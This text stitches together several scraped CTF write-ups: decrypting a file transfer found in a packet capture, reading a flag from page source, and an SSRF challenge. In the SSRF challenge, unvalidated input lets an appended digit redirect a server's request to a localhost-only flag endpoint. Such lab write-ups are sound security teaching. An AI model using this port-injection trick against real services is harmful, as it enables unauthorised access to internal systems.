1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h1><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Recon</h2>We have a pcap file so we're definitely going to use wireshark<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Execution</h2>I went ahead and opened the packet capture with wireshark and got this :First idea is to follow the TCP stream so I went to Analyze > Follow > TCP Stream :We can see that this stream contains a conversation, it looks like they're transferring a file but the receiver doesn't know how to decode it so the sender provides a command : openssl des3 -d -salt -in file.des3 -out file.txt -k supersecretpassword123des3 and a password ? that's definitely a salted password we're looking for ! let's keep looking !The third TCP stream revealed this :Bingo ! now in order to extract the file we need to convert it to raw data :We hit save as and we give it the name packet.des3 :Now from the terminal we run this modified command : openssl des3 -d -salt -in packet.des3 -out output.txt -k supersecretpassword123<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/eavesdrop] - [sam. avril 16, 16:28]└─[$] <> openssl des3 -d -salt -in packet.des3 -out output.txt -k supersecretpassword123*** WARNING : deprecated key derivation used.Using -iter or -pbkdf2 would be better.">┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/eavesdrop] - [sam. avril 16, 16:28]└─[$] <> openssl des3 -d -salt -in packet.des3 -out output.txt -k supersecretpassword123*** WARNING : deprecated key derivation used.Using -iter or -pbkdf2 would be better.</div>This command results in an output file called output.txt, we cat this file and voila !<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag</h1>picoCTF{nc_73115_411_77b05957} Download this packet capture and find the flag. Hint : All we know is that this packet capture includes a chat conversation and a file transfer. I went ahead and opened the packet capture with wireshark and got this : First idea is to follow the TCP stream so I went to Analyze > Follow > TCP Stream : We can see that this stream contains a conversation, it looks like they're transferring a file but the receiver doesn't know how to decode it so the sender provides a command : openssl des3 -d -salt -in file.des3 -out file.txt -k supersecretpassword123 des3 and a password ? that's definitely a salted password we're looking for ! let's keep looking ! The third TCP stream revealed this : Bingo ! now in order to extract the file we need to convert it to raw data : We hit save as and we give it the name packet.des3 : Now from the terminal we run this modified command : openssl des3 -d -salt -in packet.des3 -out output.txt -k supersecretpassword123 This command results in an output file called output.txt, we cat this file and voila ! picoCTF{nc_73115_411_77b05957} </div> </div></div></div> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
# Inspect HTML - picoCTF 2022 - CMU Cybersecurity CompetitionWeb Exploitation, 100 Points ## Description ![‏‏info.JPG](images/info.JPG) ## Inspect HTML Solution By browsing the [website](http://saturn.picoctf.net:59430/) from the challenge description we can see the following web page: ![webpage.JPG](images/webpage.JPG) We can simply get the flag ```picoCTF{1n5p3t0r_0f_h7ml_dd513514}``` by looking on the source file:```html <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>On Histiaeus</title> </head> <body> <h1>On Histiaeus</h1> However, according to Herodotus, Histiaeus was unhappy having to stay in Susa, and made plans to return to his position as King of Miletus by instigating a revolt in Ionia. In 499 BC, he shaved the head of his most trusted slave, tattooed a message on his head, and then waited for his hair to grow back. The slave was then sent to Aristagoras, who was instructed to shave the slave's head again and read the message, which told him to revolt against the Persians. Source: Wikipedia on Histiaeus </body></html> However, according to Herodotus, Histiaeus was unhappy having to stay in Susa, and made plans to return to his position as King of Miletus by instigating a revolt in Ionia. In 499 BC, he shaved the head of his most trusted slave, tattooed a message on his head, and then waited for his hair to grow back. The slave was then sent to Aristagoras, who was instructed to shave the slave's head again and read the message, which told him to revolt against the Persians. Source: Wikipedia on Histiaeus ```
# Web: SSRF 101 ![image](https://user-images.githubusercontent.com/74207547/160583998-d4882e9c-07f9-43a8-870d-3a732eb78781.png) We are given the source code ![image](https://user-images.githubusercontent.com/74207547/160570547-102b82f1-1b7b-41a0-912a-5213fb8b9617.png) ## Source code review >## public.js ```jsconst { URL } = require('url')const http = require('http')const express = require('express')const app = express()const publicPort = 80const private1Port = 1001 app.get('/', (req, res) => { res.sendFile(__dirname + '/public.js')}) // Use this endpoint to reach a web server which// is only locally accessible. Try: /ssrf?path=/app.get('/ssrf', (req, res) => { const path = req.query.path if (typeof path !== 'string' || path.length === 0) { res.send('path must be a non-empty string') } else { const url = `http://localhost:${private1Port}${path}` const parsedUrl = new URL(url) if (parsedUrl.hostname !== 'localhost') { // Is it even possible to get in here??? res.send('sorry, you can only talk to localhost') } else { // Make the request and return its content as our content. http.get(parsedUrl.href, ssrfRes => { let contentType = ssrfRes.headers['content-type'] let body = '' ssrfRes.on('data', chunk => { body += chunk }) ssrfRes.on('end', () => { if (contentType) { res.setHeader('Content-Type', contentType) } res.send(body) }) }).on('error', function(e) { res.send("Got error: " + e.message) }) } }}) // this port is exposed publicly app.listen(publicPort, () => { console.log(`Listening on ${publicPort}`)})``` Looks like we've got two endpoints:* `/`- prints the source of public.js file* `/ssrf` - with **path** param we can request a file from web root and the server will return its content ---Let's search how we can obtain the flag >## private2.js```jsconst express = require('express')const app = express()const private2Port = 10011 app.get('/', (req, res) => { res.sendFile(__dirname + '/private2.js')}) app.get('/flag', (req, res) => { res.sendFile(__dirname + '/flag.txt')}) // this port is only exposed locallyapp.listen(private2Port, () => { console.log(`Listening on ${private2Port}`)})``` Request to the server on localport 10011 with /flag path will return flag content.```jsconst private1Port = 1001...// this port is exposed publicly app.listen(publicPort, () => { console.log(`Listening on ${publicPort}`)})```Main web app is running on port 1001 which is weirdly similar. Let's see if we can leverage ssrf endpoint to have the server send a request to our flag. ```jsconst path = req.query.path if (typeof path !== 'string' || path.length === 0) { res.send('path must be a non-empty string') } else { const url = `http://localhost:${private1Port}${path}` const parsedUrl = new URL(url)``` The server only checks if the path is a string and is not empty. There is no slash between port and path values which can easily lead to ssrf ## Finding a way to read the flag Because there is no proper validation of user input we can inject additional `1` to the port number and then enter the path to the endpoint with our flag `/flag`. As the result of that server will make get request to `http://localhost:10011/flag` ![image](https://user-images.githubusercontent.com/74207547/160579438-a61416ea-024c-493e-923e-3324c627d608.png) ## FLAG: wsc{ssrf_c4n_b3_fun_xl9m782}
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/wiki-b72b6de22521.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wiki-1423a5c9ebf5.js"></script> <title>PicoCTF : st3g0 · not1cyyy/CTF-Writeups Wiki · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/wiki/:id(.:format)"> <meta name="current-catalog-service-hash" content="27690012a2eb28b75d0bacab0f2c11870266e8db9e019fa71fea812b82397bd6"> <meta name="request-id" content="816F:380B:418069F:42F6FF6:64121B94" data-pjax-transient="true"/><meta name="html-safe-nonce" content="6f7522826f286a00d149d948398443e6a01aa187ae45d225fd524eb475e97fba" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4MTZGOjM4MEI6NDE4MDY5Rjo0MkY2RkY2OjY0MTIxQjk0IiwidmlzaXRvcl9pZCI6IjE1NzYwODg5MDM3MjA3MDI5MiIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="9e7a74d8fcb297e1d59f3fad362643deb24810d346f41eb53e81524883280b04" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:481769760" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository" data-turbo-transient="true" /> <meta name="selected-link" value="repo_wiki" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/wiki/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="PicoCTF : st3g0" /><meta name="twitter:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta property="og:image:alt" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="PicoCTF : st3g0" /><meta property="og:url" content="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-st3g0" /><meta property="og:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="go-import" content="github.com/not1cyyy/CTF-Writeups git https://github.com/not1cyyy/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="101048320" /><meta name="octolytics-dimension-user_login" content="not1cyyy" /><meta name="octolytics-dimension-repository_id" content="481769760" /><meta name="octolytics-dimension-repository_nwo" content="not1cyyy/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="481769760" /><meta name="octolytics-dimension-repository_network_root_nwo" content="not1cyyy/CTF-Writeups" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" 